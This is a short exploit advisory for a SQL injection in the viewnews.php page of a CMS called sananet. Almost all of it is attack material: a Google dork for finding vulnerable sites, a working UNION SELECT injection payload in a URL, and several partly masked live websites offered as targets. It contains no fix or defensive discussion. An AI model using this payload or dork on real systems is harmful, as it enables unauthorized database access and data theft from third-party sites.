# Exploit Title: sananet cms sql injection
# Google Dork:intext : inurl:viewnews.php?id=
# Date: 08/09/2012
# Author: Crim3R
# Cms Creator home : http://www.sana-net.ir/
# Version: -
# Tested on: all
========================================
there is sql injection in viewnews.php
D3M0 :
http://marXXXXXhefair.com/viewnews.php?id=-120+union+all+select+1,@@version,3,4,5,6--
http://www.taXdivx.net/viewnews.php?id=101
http://www.beXXXarinhamsar.com/viewnews.php?id=112
===============Crim3R@Att.Net===========